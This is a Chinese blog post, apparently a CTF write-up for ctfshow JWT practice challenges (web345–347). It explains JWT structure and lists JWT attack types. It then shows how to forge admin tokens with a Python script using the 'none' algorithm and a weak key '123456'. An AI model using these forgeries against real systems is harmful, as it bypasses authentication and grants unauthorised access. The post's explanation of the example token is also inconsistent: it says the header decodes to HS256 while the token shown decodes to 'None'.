JWT学习(ctfshow web入门jwt)

最新推荐文章于 2024-06-03 11:02:59 发布
最新推荐文章于 2024-06-03 11:02:59 发布
阅读量1.2k 收藏 5
点赞数 1
文章标签: 编程语言 unctf javascript jwt
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45766062/article/details/121412607
版权

jwt介绍

ctfshow web入门jwt

jwt(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,JWT可用于身份认证、会话状态维持、信息交换等。它的出现是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。

一个jwt token由三部分组成,header、payload与signature,以点隔开,形如aaaa.bbbb.cccc。

一个具体的例子:

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3sic3ViIjoidXNlciJ9XQ
header用来声明token的类型和签名用的算法等,需要经过Base64Url编码。比如以上token的头部经过base64解码后为{“alg”:“HS256”,“typ”:“JWT”}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
解码为

{   
	"alg": "HS256",
    "typ": "JWT" 
}

alg属性表示签名的算法(algorithm),默认是 HMAC SHA256(写成 HS256);
typ属性表示这个令牌(token)的类型(type),JWT 令牌统一写为JWT
payload用来表示真正的token信息,也需要经过Base64Url编码。比如以上token的payload经过解码后为{“sub”:“1234567890”,“name”:“John Doe”,“iat”:1516239022}
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ
解码为

 {   
 	"sub": "1234567890",  
	"name": "John Doe",
	"iat": 1516239022 
}

JWT 规定了7个官方字段,供选用
iss (issuer):签发人
exp (expiration time):过期时间
sub (subject):主题
aud (audience):受众
nbf (Not Before):生效时间
iat (Issued At):签发时间
jti (JWT ID):编号
signature,将前两部分用alg指定的算法加密,再经过Base64Url编码就是signature了,作用是防止数据篡改。
解码
一般推荐去http://jwt.io/解码,拿上面这个例子

解密前

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3sic3ViIjoidXNlciJ9XQ
解密后

{
  "alg": "None",
  "typ": "jwt"
}
[
  {
    "sub": "user"
  }
]

JWT的安全问题
1.修改算法为none
2.修改算法从RS256到HS256
3.信息泄漏 密钥泄漏
4.爆破密钥
存在的漏洞:
CVE-2015-9235 Alg:无攻击
CVE-2016-5431密钥混淆攻击
CVE-2018-0114密钥注入攻击 其他已知攻击
JWKS欺骗
“kid”注射
跨服务中继攻击
弱密钥

web345

工具:burp suite,jwt在线解码工具链接

分析:首先看到提示/admin
在这里插入图片描述
访问抓包,看到auth,实际上就是jwt:
在这里插入图片描述
然后,用在线工具解码:

在这里插入图片描述
然后,根据提示修改sub为admin,并生成jwt:
在这里插入图片描述
然后,修改auth的值,转发得到flag:

在这里插入图片描述

web346

查看源码

where is flag?
<!-- /admin -->

访问/admin并抓包,拿到cookie

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYzNzI4ODAwNiwiZXhwIjoxNjM3Mjk1MjA2LCJuYmYiOjE2MzcyODgwMDYsInN1YiI6InVzZXIiLCJqdGkiOiJlMWJiNGMzNzU4ZDI5MDdkNmI2NzM5Y2M3NzI2MWM5MiJ9.WL38WUmRO3mH7RelgnBODbIH9XSwd6n8VpljqQ0K-z0

解码:

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iss": "admin",
  "iat": 1637288006,
  "exp": 1637295206,
  "nbf": 1637288006,
  "sub": "user",
  "jti": "e1bb4c3758d2907d6b6739cc77261c92"
}

然后把sub字段修改为admin,然后把alg修改为none,但是jwt.io网站没法生成alg为none的jwt,所以写一个脚本

import jwt
#header
header={
    "alg": "none",
    "typ": "JWT"
}
#payload
payload={
    "iss": "admin",
    "iat": 1637288006,
    "exp": 1637295206,
    "nbf": 1637288006,
    "sub": "admin",
    "jti": "e1bb4c3758d2907d6b6739cc77261c92"
}
jwtToken=jwt.encode(payload,"",algorithm="none",headers=header)
print(jwtToken)

然后将生成的cookie替换原有的获得flag。

web347

与web346类似,弱密码为123456,只需要在上面的代码中略作修改:

jwtToken=jwt.encode(payload,"123456",algorithm="HS256",headers=header)
KKKKKento
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebApiDemo(net6+swagger+jwt)
05-31
WebApiDemo是一个基于.NET 6框架的Web API项目,它集成了Swagger用于接口文档的展示与测试,同时引入了JWT(JSON Web Token)进行身份验证和授权管理。这个项目是用Visual Studio 2022开发环境构建的,旨在提供一个...
JWT学习笔记
01-21
JWT学习笔记 作为一名IT行业大师,我将详细解释JWT的概念、特点、优势和应用场景。 什么是JWT? JSON Web Token(JWT)是一种基于JSON的Web令牌,用于在各方之间安全地传输信息。它可以完成数据加密、签名等相关...
ctfshow web入门 JWT
Anton1a的博客
02-24 4282
web345 打开题目先F12看一下源码发现一个admin目录,然后抓包看见cookie里面有jwt 然后将jwt进行base64解密,然后将解码后的user换成admin 再进行base64加密,然后抓包访问admin目录,之后将刚才生成的jwt,替换cookie里的jwt然后发包拿到flag 这里只需要注意访问的是/admin/而不是/admin因为访问/admin表示访问admin.php而访问/admin/表示访问的是admin目录下默认的index.php web346 这.
安全经典JWT算法漏洞
kali_Ma的博客
11-29 5873
1、什么是JWT? JSON Web令牌(JWT)是一个开放标准(RFC 7519),它定义了一种紧凑而独立的方法,用于在各方之间安全地将信息作为JSON对象传输。由于此信息是经过数字签名的,因此可以被验证和信任。可以使用secret(HMAC算法)或使用“RSA或ECDSA的公用/私有key pair密钥对”对JWT进行签名。 尽管可以对JWT进行加密以提供双方之间的secrecy保密性,但我们将重点关注signed tokens已签名的令牌。signed tokens已签名的令牌可以
ctfshow jwt web入门
最新发布
2301_81040377的博客
06-03 494
jwt令牌由三部分组成,由分割header示例payload示例。
ctfshow web入门 jwt
Sentiment的博客
12-10 2412
基础知识 jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature) 头部 头部声明了类型和加密方法,如下 { 'typ': 'JWT', 'alg': 'HS256' } 然后将头部进行base64加密后去掉=号,构成第一部分 ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9 载荷 和头部结构类似,但存放的是数据 签证 jwt的第三部分是一个签证信息,这个签证信息由三部分组成:
CTFSHOW jwt
羽的博客
12-30 5688
可以先了解下jwt jwt由三部分组成header、payload、signature header示例 { 'typ': 'JWT', 'alg': 'HS256' } payload示例 { "sub": "1234567890", "name": "John Doe" } signature jwt的第三部分是一个签证信息,这个签证信息由三部分组成: header (base64编码) payload (base64编码) secret(密钥) 这个部分需要base64加密后的he
JWT(java web Token)
01-22
Java Web Token(JWT)是一种开放的标准(RFC 7519),定义了一种紧凑的、自包含的方式来安全地在各方之间传输信息作为一个JSON对象。这个信息可以被验证和信任,因为它是数字签名的。JWT在身份验证和授权场景中广泛...
web api JWT token认证
04-24
Web API JWT Token认证是现代Web应用中一种常见的安全机制,用于保护API接口免受未经授权的访问。JWT(JSON Web Tokens)是一种轻量级的身份验证和授权机制,它允许客户端通过在请求头中发送一个令牌来证明其身份。...
SpringBoot集成JWT快速入门Demo
04-10
编译器版本:IntelliJ IDEA 2020.3.2 x64 JDK版本:java 1.8.0_111 SpringBoot集成JWT快速入门Demo,演示jwt生成与验证等功能,可以通过swaggler或者Postman进行测试。
BUUCTF刷题记录[RootersCTF2019]ImgXweb——JWT验证问题
u013119911的博客
07-02 8333
JWT
CTFshow JWT
starttv的博客
11-24 400
JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案,该规范允许我们通过JWT在用户和服务器之间安全可靠地传递信息。
CTF-Web jwt
Makabakahaha的博客
10-04 242
web做题记录
Ctfshow web入门 JWTweb345-web350 详细题解 全
Jay17的博客
08-02 2201
Ctfshow web入门 JWTweb345-web350 详细题解 全
ctfshow jwt学习
hcja666的博客
05-02 1040
JSON Web Token(JWT)是一个开放标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于在各方之间安全地传输信息作为JSON对象。此信息可以被验证和信任,因为它是数字签名的。JWT可以使用秘密(使用HMAC算法)或使用RSA或ECDSA的公钥/私钥对进行签名。Header报头Payload有效载荷Signature签名因此,JWT通常看起来如下所示。Header报头Payload有效载荷iss:发行人exp:到期时间sub:主题aud:用户。
[CTFSHOW]JWT
Y4tacker的博客
01-12 4974
文章目录前言JWT简介CTFSHOW Web345CTFSHOW Web346前置知识开始做题CTFSHOW Web347CTFSHOW Web348CTFSHOW Web349CTFSHOW Web350前置知识利用WP如何防御 前言 有些师傅向我咨询WP,索性就发了吧,其实早就写好了,只是懒,在github仓库里囤着 JWT简介 可以看看我的Github总结给自己看的,Y4tacker CTFSHOW Web345 首先打开题目,查看源码,接下来访问/admin被跳转回主页啥也没有发生 where is
ctf web 的一些writeup jwt以及黑客游戏
qq_42520737的博客
08-09 3768
http://54.223.83.192:8877/ jwt 登陆问题 JSON Web Token(JWT)是一个开放式标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于在各方之间以JSON对象安全传输信息。这些信息可以通过数字签名进行验证和信任。可以使用秘密(使用HMAC算法)或使用RSA的公钥/私钥对对JWT进行签名。       这道题的解题方式就是对其进行登陆抓...
ctfshow JWT
09-08
CTFShow JWT是一个由头部、有效载荷和签名三部分组成的JSON Web Token。其中,头部包含了JWT的类型和使用的算法,有效载荷包含了一些信息,比如发行者、颁发时间、过期时间等,签名则用于验证JWT的完整性和真实性。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值